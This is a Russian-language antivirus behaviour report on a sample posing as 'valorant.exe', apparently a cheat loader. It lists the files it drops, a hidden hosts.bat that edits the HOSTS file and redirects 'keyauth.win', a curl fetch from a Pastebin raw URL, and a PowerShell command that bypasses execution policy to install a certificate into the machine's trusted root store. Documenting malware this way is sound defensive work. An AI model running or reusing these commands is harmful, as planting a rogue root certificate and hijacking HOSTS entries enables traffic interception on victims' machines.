Техническая информация
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\aut2edc.tmp
- %TEMP%\valorant.exe
- %TEMP%\aut2fd7.tmp
- %TEMP%\hosts.bat
- nul
Удаляет следующие файлы
- %TEMP%\aut2edc.tmp
- %TEMP%\aut2fd7.tmp
- %TEMP%\hosts.bat
Изменяет файл HOSTS.
Другое
Создает и запускает на исполнение
- '%TEMP%\valorant.exe'
- '%WINDIR%\syswow64\cmd.exe' /c %TEMP%\hosts.bat' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /c %TEMP%\hosts.bat
- '%WINDIR%\syswow64\cmd.exe' /c curl -s https://pastebin.com/raw/sD69ivJ5
- '%WINDIR%\syswow64\cmd.exe' /S /D /c" echo "
- '%WINDIR%\syswow64\findstr.exe' /R "^[0-9]*\.[0-9]*\.[0-9]*\.[0-9]*$"
- '%WINDIR%\syswow64\certutil.exe' -store TrustedRoot
- '%WINDIR%\syswow64\findstr.exe' /i /c:"%TEMP%\server.crt"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -Command "Import-Certificate -FilePath '%TEMP%\server.crt' -CertStoreLocation 'Cert:\LocalMachine\Root' -ErrorAction SilentlyContinue"
- '%WINDIR%\syswow64\findstr.exe' /C:" keyauth.win" "<DRIVERS>\etc\hosts"
- '%WINDIR%\syswow64\ipconfig.exe' /flushdns
- '%WINDIR%\explorer.exe'
- '<SYSTEM32>\cmd.exe' /c certutil -hashfile "%WINDIR%\explorer.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
- '<SYSTEM32>\certutil.exe' -hashfile "%WINDIR%\explorer.exe" MD5
- '<SYSTEM32>\find.exe' /i /v "md5"
- '<SYSTEM32>\find.exe' /i /v "certutil"
